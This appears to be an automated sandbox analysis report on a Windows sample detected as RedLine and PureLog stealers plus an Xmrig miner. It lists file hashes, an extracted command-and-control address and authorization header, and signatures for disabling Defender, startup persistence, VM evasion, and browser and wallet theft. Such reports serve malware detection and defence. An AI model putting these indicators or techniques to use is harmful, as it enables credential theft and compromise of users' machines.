Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1466434
MD5: fdb35993f43fb0c0b3fadb2aef70b0be
SHA1: 0881f937004e97e9aa3ee8688dccbd48ba2303ab
SHA256: 4b5b5a34e4b2dd842b5a097a93a47385316f68907fe5b512b494c6a608e446ee
Tags: exe
Infos:

Detection

PureLog Stealer, RedLine, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list
C2 URLs / IPs found in malware configuration
Disables Windows Defender (via service or powershell)
Drops PE files to the startup folder
Encrypted powershell cmdline option found
Excessive usage of taskkill to terminate processes
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Potentially malicious time measurement code found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses net.exe to stop services
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Name Description Attribution Blogpost URLs Link
xmrig According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Avira: detection malicious, Label: HEUR/AGEN.1321051
Found malware configuration
Source: 0000005D.00000003.2800628651.0000000007379000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": "147.45.78.229:43674", "Authorization Header": "6a4b05ef943a0dd801fd01dfbb9eb717"}
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\1.exe ReversingLabs: Detection: 91%
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe ReversingLabs: Detection: 68%
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\1.exe ReversingLabs: Detection: 91%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\mig.exe Joe Sandbox ML: detected
Source: C:\ProgramData\1.exe Joe Sandbox ML: detected
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\1.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8003900 CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B8003900
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE16E0 CRYPTO_zalloc, 16_2_00007FF8B7FE16E0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FFD940 CRYPTO_mem_ctrl,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,OPENSSL_sk_push,OPENSSL_sk_sort,CRYPTO_mem_ctrl, 16_2_00007FF8B7FFD940
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FFF960 strncmp,strncmp,strncmp,strncmp,ERR_put_error,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,ERR_put_error,strncmp,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free, 16_2_00007FF8B7FFF960
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8031960 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy, 16_2_00007FF8B8031960
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1CC6 CRYPTO_malloc,COMP_expand_block, 16_2_00007FF8B7FE1CC6
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8019A30 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free,CRYPTO_free, 16_2_00007FF8B8019A30
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FFDA30 COMP_zlib,CRYPTO_mem_ctrl,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,OPENSSL_sk_sort,CRYPTO_mem_ctrl, 16_2_00007FF8B7FFDA30
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE17CB CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free, 16_2_00007FF8B7FE17CB
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B801FA50 CRYPTO_memcmp, 16_2_00007FF8B801FA50
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1D43 BN_num_bits,CRYPTO_malloc,BN_bn2bin,BN_clear_free,BN_clear_free, 16_2_00007FF8B7FE1D43
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE21AD memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock, 16_2_00007FF8B7FE21AD
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1EF1 CRYPTO_malloc,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_put_error,CRYPTO_clear_free, 16_2_00007FF8B7FE1EF1
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8037AE0 CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B8037AE0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE16B3 OPENSSL_sk_new_null,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_clear_error,OPENSSL_sk_value,X509_get0_pubkey,EVP_PKEY_missing_parameters,X509_free,X509_up_ref,X509_free,OPENSSL_sk_pop_free, 16_2_00007FF8B7FE16B3
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FFBB70 CRYPTO_zalloc,ERR_put_error,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_free, 16_2_00007FF8B7FFBB70
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FF9B70 CRYPTO_free,CRYPTO_strndup, 16_2_00007FF8B7FF9B70
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE109B CRYPTO_free,CRYPTO_memdup,CRYPTO_memdup, 16_2_00007FF8B7FE109B
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE7BA0 CRYPTO_free, 16_2_00007FF8B7FE7BA0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FEDBE0 CRYPTO_free, 16_2_00007FF8B7FEDBE0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FFDC70 CRYPTO_THREAD_run_once, 16_2_00007FF8B7FFDC70
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FEDC90 CRYPTO_free, 16_2_00007FF8B7FEDC90
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8013C80 OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock, 16_2_00007FF8B8013C80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE22F7 CRYPTO_free, 16_2_00007FF8B7FE22F7
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE17D0 CRYPTO_malloc,memcpy, 16_2_00007FF8B7FE17D0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE7CF0 CRYPTO_free, 16_2_00007FF8B7FE7CF0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FEDCF0 CRYPTO_free, 16_2_00007FF8B7FEDCF0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8039CDC CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B8039CDC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1E4C CRYPTO_clear_free, 16_2_00007FF8B7FE1E4C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8037D00 CRYPTO_free,CRYPTO_strndup, 16_2_00007FF8B8037D00
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FF7D40 CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B7FF7D40
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8005D50 ERR_put_error,CRYPTO_free,ERR_put_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free, 16_2_00007FF8B8005D50
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B801FD80 CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B801FD80
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FEDDA0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc, 16_2_00007FF8B7FEDDA0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FEFDB0 EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,CRYPTO_memcmp,strncmp,strncmp,strncmp,strncmp,strncmp, 16_2_00007FF8B7FEFDB0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8017DD0 CRYPTO_zalloc,CRYPTO_free, 16_2_00007FF8B8017DD0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE7DF0 CRYPTO_zalloc,ERR_put_error, 16_2_00007FF8B7FE7DF0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8013E40 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset, 16_2_00007FF8B8013E40
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8027E6F CRYPTO_malloc, 16_2_00007FF8B8027E6F
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FF5E70 CRYPTO_free,CRYPTO_strdup, 16_2_00007FF8B7FF5E70
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1CD5 CRYPTO_free,CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B7FE1CD5
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1E56 CRYPTO_zalloc,ERR_put_error,BUF_MEM_grow,CRYPTO_free, 16_2_00007FF8B7FE1E56
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B802BEF0 EVP_CIPHER_CTX_free,CRYPTO_free,CRYPTO_free, 16_2_00007FF8B802BEF0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1208 CRYPTO_zalloc,memcpy,memcpy,memcpy,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free, 16_2_00007FF8B7FE1208
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1B8B CRYPTO_free,CRYPTO_malloc, 16_2_00007FF8B7FE1B8B
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE7F50 CRYPTO_zalloc,ERR_put_error, 16_2_00007FF8B7FE7F50
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B801FF70 CRYPTO_free,CRYPTO_strndup, 16_2_00007FF8B801FF70
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1AB4 CRYPTO_free, 16_2_00007FF8B7FE1AB4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FF5FAA CRYPTO_free, 16_2_00007FF8B7FF5FAA
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE9FC0 CRYPTO_malloc,memset,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 16_2_00007FF8B7FE9FC0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8037FC0 CRYPTO_malloc,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,RAND_bytes,EVP_sha256,EVP_EncryptUpdate,EVP_EncryptFinal,HMAC_Update,HMAC_Final, 16_2_00007FF8B8037FC0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8029FC0 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free, 16_2_00007FF8B8029FC0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FF7FE0 EVP_PKEY_CTX_new,EVP_PKEY_derive_init,EVP_PKEY_derive_set_peer,EVP_PKEY_derive,CRYPTO_malloc,EVP_PKEY_derive,CRYPTO_clear_free,EVP_PKEY_CTX_free, 16_2_00007FF8B7FF7FE0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FEDFE0 CRYPTO_malloc, 16_2_00007FF8B7FEDFE0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE14FB CRYPTO_free,CRYPTO_memdup,ERR_put_error, 16_2_00007FF8B7FE14FB
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8002010 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free, 16_2_00007FF8B8002010
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE210D HMAC_CTX_new,EVP_CIPHER_CTX_new,EVP_sha256,HMAC_Init_ex,EVP_aes_256_cbc,HMAC_size,EVP_CIPHER_CTX_iv_length,HMAC_Update,HMAC_Final,CRYPTO_memcmp,EVP_CIPHER_CTX_iv_length,EVP_CIPHER_CTX_iv_length,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free, 16_2_00007FF8B7FE210D
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE2243 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_put_error, 16_2_00007FF8B7FE2243
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE15C8 EVP_MD_CTX_new,EVP_PKEY_new,EVP_PKEY_assign,DH_free,EVP_PKEY_security_bits,EVP_PKEY_get0_DH,EVP_PKEY_free,DH_get0_key,EVP_PKEY_get1_tls_encodedpoint,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,EVP_PKEY_size,EVP_DigestSignInit,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,EVP_DigestSign,CRYPTO_free,EVP_MD_CTX_free, 16_2_00007FF8B7FE15C8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE402B BIO_get_data,BIO_get_shutdown,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,ERR_put_error,BIO_set_init,BIO_clear_flags,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init, 16_2_00007FF8B7FE402B
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1249 CRYPTO_zalloc,ERR_put_error,_time64,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,memcpy, 16_2_00007FF8B7FE1249
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FF40B0 CRYPTO_clear_free, 16_2_00007FF8B7FF40B0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1B0E memset,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,CRYPTO_memcmp, 16_2_00007FF8B7FE1B0E
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1F5F CRYPTO_strdup, 16_2_00007FF8B7FE1F5F
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B800C0F0 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_put_error, 16_2_00007FF8B800C0F0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8017150 CRYPTO_free, 16_2_00007FF8B8017150
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1AFF CRYPTO_malloc,CRYPTO_mem_ctrl,OPENSSL_sk_find,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,OPENSSL_sk_push,CRYPTO_mem_ctrl,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error, 16_2_00007FF8B7FE1AFF
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1C3A X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free, 16_2_00007FF8B7FE1C3A
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1F55 CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B7FE1F55
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE10A5 CRYPTO_zalloc,ERR_put_error,ERR_put_error,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_malloc,memcpy,CRYPTO_malloc,memcpy,ERR_put_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup, 16_2_00007FF8B7FE10A5
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FF7290 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free, 16_2_00007FF8B7FF7290
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE165E CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free, 16_2_00007FF8B7FE165E
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1D7F BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup, 16_2_00007FF8B7FE1D7F
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE2176 EVP_MD_CTX_new,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestSignInit,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,EVP_DigestUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,EVP_DigestSign,BUF_reverse,CRYPTO_free,EVP_MD_CTX_free,CRYPTO_free,EVP_MD_CTX_free, 16_2_00007FF8B7FE2176
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE2144 CRYPTO_free,CRYPTO_malloc,RAND_bytes, 16_2_00007FF8B7FE2144
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1C03 CRYPTO_free,CRYPTO_strdup, 16_2_00007FF8B7FE1C03
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1005 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset, 16_2_00007FF8B7FE1005
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FFD3E0 CRYPTO_THREAD_run_once, 16_2_00007FF8B7FFD3E0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8023440 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,_time64,memcpy,OPENSSL_cleanse,OPENSSL_cleanse,EVP_MD_size, 16_2_00007FF8B8023440
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE186B CRYPTO_free,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B7FE186B
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1AB9 CONF_parse_list,CRYPTO_malloc,ERR_put_error,memcpy,CRYPTO_free,CRYPTO_free, 16_2_00007FF8B7FE1AB9
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B800546A CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 16_2_00007FF8B800546A
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1690 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 16_2_00007FF8B7FE1690
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1681 CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B7FE1681
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE207C CRYPTO_free,_time64,CRYPTO_free,CRYPTO_malloc,EVP_sha256,EVP_Digest,EVP_MD_size,CRYPTO_free, 16_2_00007FF8B7FE207C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B803F4A0 BN_bin2bn,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup, 16_2_00007FF8B803F4A0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B801F4D0 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free, 16_2_00007FF8B801F4D0
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE125D BIO_pop,BIO_free,BIO_free_all,BIO_free_all,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_THREAD_lock_free,CRYPTO_free, 16_2_00007FF8B7FE125D
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE101E EVP_PKEY_free,BN_num_bits,BN_bn2bin,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_clear_free, 16_2_00007FF8B7FE101E
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE9510 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free, 16_2_00007FF8B7FE9510
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B8019570 CRYPTO_memcmp, 16_2_00007FF8B8019570
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE20DB CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock, 16_2_00007FF8B7FE20DB
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE12E4 EVP_MD_size,RAND_bytes,_time64,CRYPTO_free,CRYPTO_memdup, 16_2_00007FF8B7FE12E4
